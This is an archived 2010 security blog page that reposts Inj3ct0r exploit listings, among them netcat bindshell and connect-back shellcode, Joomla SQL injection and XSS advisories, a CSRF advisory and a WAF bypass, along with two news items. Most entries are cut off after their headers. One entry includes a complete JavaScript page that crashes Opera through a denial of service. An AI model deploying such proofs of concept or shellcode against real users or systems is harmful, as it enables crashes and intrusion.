Information Security News and Exploits

Providing you with Security News and Exploits from all over the web.

Entries for July 13th, 2010

linux/x86 netcat bindshell port 8080 75 bytes

Jul.13, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>linux/x86 netcat bindshell port 8080 75 bytes</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=============================================
linux/x86 netcat bindshell port 8080 75 bytes
=============================================
/* 08048060 &lt;_start&gt;:
8048060: eb 2a [...]

Leave a Comment

linux/x86 netcat connect back port 8080 76 bytes

Jul.13, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>linux/x86 netcat connect back port 8080 76 bytes</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>================================================
linux/x86 netcat connect back port 8080 76 bytes
================================================
/*
08048060 &lt;_start&gt;:
8048060: eb 2a [...]

Leave a Comment

Joomla Health & Fitness Stats Persistent XSS Vulnerability

Jul.13, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Health &amp; Fitness Stats Persistent XSS Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==========================================================
Joomla Health &amp; Fitness Stats Persistent XSS Vulnerability
==========================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ [...]

Leave a Comment

Opera Denial of Service by Element

Jul.13, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Opera Denial of Service by &lt;canvas&gt; Element</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===========================================
Opera Denial of Service by &lt;canvas&gt; Element
===========================================
Opera.html
&lt;html&gt;
&lt;body onload=&quot;Opera()&quot;&gt;
&lt;script language=JavaScript&gt;
function Opera() {
canvas = document.getElementById(&quot;canvas&quot;);
ctx = canvas.getContext(&quot;2d&quot;);
ctx.getImageData(0,0,0×20000,0×20000);
}
&lt;/script&gt;
&lt;canvas id=canvas width=10 height=10&gt;&lt;/canvas&gt;
&lt;/body&gt;
&lt;/html&gt;
# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-12]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript [...]

Leave a Comment

Joomla Component com_zoom (XSS/Blind SQLi/SQL Injection) Vulnerability

Jul.13, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_zoom (XSS/Blind SQLi/SQL Injection) Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>======================================================================
Joomla Component com_zoom (XSS/Blind SQLi/SQL Injection) Vulnerability
======================================================================
#######################################
I’m SixP4ck3r member from Inj3ct0r Team
#######################################
Author : SixP4ck3r
Email &amp; msn : SixP4ck3r@Bolivia.com
Date : 13 July 2010
Critical Lvl : High
Impact : Exposure of sensitive information
Where : [...]

Leave a Comment

BigThink XT (index.php) SQL Injection Vulnerability

Jul.13, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>BigThink XT (index.php) SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===================================================
BigThink XT (index.php) SQL Injection Vulnerability
===================================================
____ ______ __ __ __ __ ____ [...]

Leave a Comment

MediaDesignStudio SQL Injection Vulnerability

Jul.13, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>MediaDesignStudio SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=============================================
MediaDesignStudio SQL Injection Vulnerability
=============================================
__ __
.—-..–.–.| |–..—–..—-.| |.—–..—–.
| __|| | || _ [...]

Leave a Comment

AJ Article Persistent Xss Vulnerability

Jul.13, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>AJ Article Persistent Xss Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=======================================
AJ Article Persistent Xss Vulnerability
=======================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Joomla Component com_qcontacts SQL Injection Vulnerability

Jul.13, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_qcontacts SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==========================================================
Joomla Component com_qcontacts SQL Injection Vulnerability
==========================================================
# Exploit Title: Joomla Component QContacts (com_qcontacts) – SQL Injection Vulnerability
# Date: 12, July 2010
# Author: _mlk_
# Software Link: http://bugsec.googlecode.com/files/Joomla_com_qcontacts.zip
# Version: 1.0.4 and previous
# Tested on: [...]

Leave a Comment

I-net Enquiry management Script SQL Injection Vulnerability

Jul.13, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>I-net Enquiry management Script SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===========================================================
I-net Enquiry management Script SQL Injection Vulnerability
===========================================================
Name : I-net Enquiry management Script SQL Injection Vulnerability
Date : july 13, 2010
Critical Level : HIGH
Vendor Url : http://www.i-netsolution.com/
Author : [...]

Leave a Comment

Diferior CMS 8.03 Multiple CSRF Vulnerabilities

Jul.13, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Diferior CMS 8.03 Multiple CSRF Vulnerabilities</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===============================================
Diferior CMS 8.03 Multiple CSRF Vulnerabilities
===============================================
&lt;!—
Title: Diferior CMS 8.03 Multiple CSRF Vulnerabilities
Author: 10n1z3d &lt;10n1z3d[at]w[dot]cn&gt;
Date: Tue 13 Jul 2010 11:50:32 AM [...]

Leave a Comment

Joomla com_ambra Persistent Xss Vulnerability

Jul.13, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla com_ambra Persistent Xss Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=============================================
Joomla com_ambra Persistent Xss Vulnerability
=============================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

Joomla Component com_police SQL Injection Vulnerability

Jul.13, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_police SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=======================================================
Joomla Component com_police SQL Injection Vulnerability
=======================================================
# Title: Joomla Component { com_police } SQL Injection Vulnerability
# Author: Islam DefenDers
# Published: 2010-7-13
view source
#=Info=================================================
# Software: Joomla Component { com_police } SQL Injection Vulnerability
# Vulnerability: Remote [...]

Leave a Comment

CustomCMS Persistent XSS Vulnerability

Jul.13, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>CustomCMS Persistent XSS Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>======================================
CustomCMS Persistent XSS Vulnerability
======================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

ASX to MP3 Converter v3.1.2.1 SEH (Multiple OS, DEP and ASLR Bypass)

Jul.13, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>ASX to MP3 Converter v3.1.2.1 SEH (Multiple OS, DEP and ASLR Bypass)</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>====================================================================
ASX to MP3 Converter v3.1.2.1 SEH (Multiple OS, DEP and ASLR Bypass)
====================================================================
# Exploit Title: ASX to MP3 Converter v3.1.2.1 SEH Exploit (Multiple [...]

Leave a Comment

dotDefender 4.02 Authentication Bypass Vulnerability

Jul.13, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>dotDefender 4.02 Authentication Bypass Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>====================================================
dotDefender 4.02 Authentication Bypass Vulnerability
====================================================
dotDefender is prone to a XSS because it doesn’t satinate the input vars
correctly. Injecting obfusctated JavaScript code based on references vars
assignment, the dotDefender WAF is vulnerable.
Class: Input Validation Error
Remote: [...]

Leave a Comment

IDEA Web Agency (index.php) Blind SQL Injection Vulnerability

Jul.13, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>IDEA Web Agency (index.php) Blind SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=============================================================
IDEA Web Agency (index.php) Blind SQL Injection Vulnerability
=============================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ [...]

Leave a Comment

D-Tekweb (index.php) SQL Injection Vulnerability

Jul.13, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>D-Tekweb (index.php) SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>================================================
D-Tekweb (index.php) SQL Injection Vulnerability
================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

ESRB unintentionally exposes email addresses of people who filed complaints

Jul.13, 2010 in News

During the recent Real ID catastrophe on the forums, many players decided to appeal to an industry source that might have been able to sway Blizzard to change its mind.
These players contacted the ESRB (Entertainment Software Rating Board) as a Better Business Bureau-type middleman in this situation with their concerns. The ESRB itself has [...]

Leave a Comment

Oracle to Issue 59 Critical Patches

Jul.13, 2010 in News

Oracle on Tuesday will release 59 patches to fix security weaknesses affecting hundreds of products, according to a notice on its Web site.
Twenty-one of the vulnerabilities affect products related to Solaris, the Unix operating system Oracle acquired through its purchase of Sun Microsystems. Seven of them can be exploited remotely over a network without requiring [...]

Leave a Comment